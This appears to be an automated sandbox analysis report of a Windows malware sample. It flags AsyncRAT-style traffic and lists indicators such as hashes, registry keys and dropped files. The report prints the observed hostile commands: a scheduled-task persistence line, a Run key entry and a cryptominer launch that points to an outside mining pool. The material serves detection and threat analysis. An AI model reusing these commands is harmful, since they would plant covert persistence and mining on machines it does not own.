e54ccfd9a2ab15b4461eb38baec21eb828f7757ca3e67db3b7acb261be34adcd

Analysis

max time kernel
150s
max time network
153s
platform
windows7_x64
resource
win7-20220414-en
submitted
18-05-2022 22:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ff72b295ded9889cee24320db368bcf1.exe
Size

809KB
MD5

ff72b295ded9889cee24320db368bcf1
SHA1

5d7991f8495d56088710dd558faba639ffd05292
SHA256

e54ccfd9a2ab15b4461eb38baec21eb828f7757ca3e67db3b7acb261be34adcd
SHA512

37ab209741e90c78565d170ab48d7ee83c8633e93e646a4c8f639c305c8b6528841668b6aa7797870612d24e11e1ff1aaae0f5622e9a2195957f9142e93a7b1b

Score

10^/10

persistence suricata

Malware Config

Signatures

suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
suricata

Executes dropped EXE 2 IoCs

pid	Process
432	IFMb39aGmCsqJcthXwNQEToq7.exe
1636	WlaOrzbfdk.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WlaOrzbfdk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WlaOrzbfdk.exe

Deletes itself 1 IoCs

pid	Process
1988	cmd.exe

Loads dropped DLL 2 IoCs

pid	Process
316	ff72b295ded9889cee24320db368bcf1.exe
432	IFMb39aGmCsqJcthXwNQEToq7.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TxMT8hHkO8fBB5FlBurdwljpn = "C:\\ProgramData\\4vFAHkNczECIXuLdvBZKuXofw\\IFMb39aGmCsqJcthXwNQEToq7.exe"	ff72b295ded9889cee24320db368bcf1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
580	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
752	timeout.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
432	IFMb39aGmCsqJcthXwNQEToq7.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe
316	ff72b295ded9889cee24320db368bcf1.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	316	ff72b295ded9889cee24320db368bcf1.exe
Token: SeDebugPrivilege	316	ff72b295ded9889cee24320db368bcf1.exe
Token: SeDebugPrivilege	432	IFMb39aGmCsqJcthXwNQEToq7.exe
Token: SeDebugPrivilege	432	IFMb39aGmCsqJcthXwNQEToq7.exe
Token: SeLockMemoryPrivilege	1636	WlaOrzbfdk.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 316 wrote to memory of 580	316	ff72b295ded9889cee24320db368bcf1.exe	29
PID 316 wrote to memory of 580	316	ff72b295ded9889cee24320db368bcf1.exe	29
PID 316 wrote to memory of 580	316	ff72b295ded9889cee24320db368bcf1.exe	29
PID 316 wrote to memory of 432	316	ff72b295ded9889cee24320db368bcf1.exe	31
PID 316 wrote to memory of 432	316	ff72b295ded9889cee24320db368bcf1.exe	31
PID 316 wrote to memory of 432	316	ff72b295ded9889cee24320db368bcf1.exe	31
PID 316 wrote to memory of 1988	316	ff72b295ded9889cee24320db368bcf1.exe	32
PID 316 wrote to memory of 1988	316	ff72b295ded9889cee24320db368bcf1.exe	32
PID 316 wrote to memory of 1988	316	ff72b295ded9889cee24320db368bcf1.exe	32
PID 1988 wrote to memory of 752	1988	cmd.exe	34
PID 1988 wrote to memory of 752	1988	cmd.exe	34
PID 1988 wrote to memory of 752	1988	cmd.exe	34
PID 432 wrote to memory of 1636	432	IFMb39aGmCsqJcthXwNQEToq7.exe	36
PID 432 wrote to memory of 1636	432	IFMb39aGmCsqJcthXwNQEToq7.exe	36
PID 432 wrote to memory of 1636	432	IFMb39aGmCsqJcthXwNQEToq7.exe	36

C:\Users\Admin\AppData\Local\Temp\ff72b295ded9889cee24320db368bcf1.exe
"C:\Users\Admin\AppData\Local\Temp\ff72b295ded9889cee24320db368bcf1.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:316
- C:\Windows\system32\schtasks.exe
  "schtasks.exe" /create /tn TxMT8hHkO8fBB5FlBurdwljpn /tr "C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe" /st 00:18 /du 23:59 /sc daily /ri 1 /f
  2⤵
  - Creates scheduled task(s)
  PID:580
- C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe
  "C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:432
- - C:\ProgramData\15B34D9CC5\MOxnfkG4eOfW0IpCi6MLrNgpm6qVgIEfhV3XOHL2\WlaOrzbfdk.exe
    "C:\ProgramData\15B34D9CC5\MOxnfkG4eOfW0IpCi6MLrNgpm6qVgIEfhV3XOHL2\WlaOrzbfdk.exe" --url xmr.hashcity.org:4444 --user first1805.15B34D9CC5 --pass x --title Service --cpu-max-threads-hint=70 --donate-level 0
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Suspicious use of AdjustPrivilegeToken
    PID:1636
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2C5F.tmp.bat""
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:1988
- - C:\Windows\system32\timeout.exe
    timeout 6
    3⤵
    - Delays execution with timeout.exe
    PID:752

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\15B34D9CC5\MOxnfkG4eOfW0IpCi6MLrNgpm6qVgIEfhV3XOHL2\WlaOrzbfdk.exe

Filesize
30.0MB

MD5
bb938d4d31e9376118c606cc5b758374

SHA1
5d2660cce961446e9cfec8713234441bd9f0acfe

SHA256
a55d7e61b1675cd231b1be2051f533a56e3c740a19ce63f472ae0e828aba8d61

SHA512
da54a36990d27144fac219da4030e73a247ba5f25c6f65477cfe0aa50b94e9c135d419ac515d48d877912d47c5ec5a3ea6106baedb0feb0bd2612739034c63f2

Download Submit
C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe

Filesize
384.2MB

MD5
68a228a39a510c8348616f5d2305cb13

SHA1
00a8fdd9395c40078c9066e30e9e710c5a481df9

SHA256
77e420c346626db246043a875767a0e335505e46723e20178aa23a977c90e0fe

SHA512
85bc8eece24e8840723708438643d6af0205afe700dbf22998ac3c1e58b6f2c7008c1c3927e2a19211967d8c988b254c5f112be9c44cb47f050075d369631f54

Download Submit
C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe

Filesize
384.2MB

MD5
68a228a39a510c8348616f5d2305cb13

SHA1
00a8fdd9395c40078c9066e30e9e710c5a481df9

SHA256
77e420c346626db246043a875767a0e335505e46723e20178aa23a977c90e0fe

SHA512
85bc8eece24e8840723708438643d6af0205afe700dbf22998ac3c1e58b6f2c7008c1c3927e2a19211967d8c988b254c5f112be9c44cb47f050075d369631f54

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2C5F.tmp.bat

Filesize
184B

MD5
71c96d228508b1a6ba2bd42acc6b13e4

SHA1
dbc20c17121007ce20ff7d026c31ad949140119a

SHA256
6bdd18297e4faa73f9bc4b6c7c527074d4eb0b1f24f8b8910e2ca3f032e2335d

SHA512
f853778c8239395f2adddaa5f01f18db0b9817cb993d88ff2f169523cf83ae0515dcc8d0ee98c700d7210b22e8b585bb6e1edbebd50cf574bb6820fa988df2e8

Download Submit
\ProgramData\15B34D9CC5\MOxnfkG4eOfW0IpCi6MLrNgpm6qVgIEfhV3XOHL2\WlaOrzbfdk.exe

Filesize
30.0MB

MD5
bb938d4d31e9376118c606cc5b758374

SHA1
5d2660cce961446e9cfec8713234441bd9f0acfe

SHA256
a55d7e61b1675cd231b1be2051f533a56e3c740a19ce63f472ae0e828aba8d61

SHA512
da54a36990d27144fac219da4030e73a247ba5f25c6f65477cfe0aa50b94e9c135d419ac515d48d877912d47c5ec5a3ea6106baedb0feb0bd2612739034c63f2

Download Submit
\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe

Filesize
381.4MB

MD5
fdde7f59e4c799e5f49a8c5c12b00a40

SHA1
be0818e7a48d303ac197c8b6e5d0e39d56f76087

SHA256
bb931b0b0d143005f2be5cd221f2762ba0c545ae2d7e97dbbe2ca6a84e80cb7f

SHA512
4b4f29745b959b35d59882caa7118baf92e95cac3a8f112d43ed5bb8d068a90deb43e6ad335e8144a716898249a141f88a6a4bd3c7dc31c6a2a189962deb455c

Download Submit
memory/316-57-0x000000001B976000-0x000000001B995000-memory.dmp

Filesize
124KB

Download
memory/316-54-0x000000013F520000-0x000000013F5EE000-memory.dmp

Filesize
824KB

Download
memory/316-56-0x0000000000740000-0x0000000000746000-memory.dmp

Filesize
24KB

Download
memory/316-55-0x000000001B800000-0x000000001B8D6000-memory.dmp

Filesize
856KB

Download
memory/432-63-0x000000013FBF0000-0x000000013FCBE000-memory.dmp

Filesize
824KB

Download
memory/432-68-0x000000001AC46000-0x000000001AC65000-memory.dmp

Filesize
124KB

Download
memory/432-67-0x000000001DD70000-0x000000001DE3A000-memory.dmp

Filesize
808KB

Download
memory/1636-72-0x0000000006010000-0x0000000006030000-memory.dmp

Filesize
128KB

Download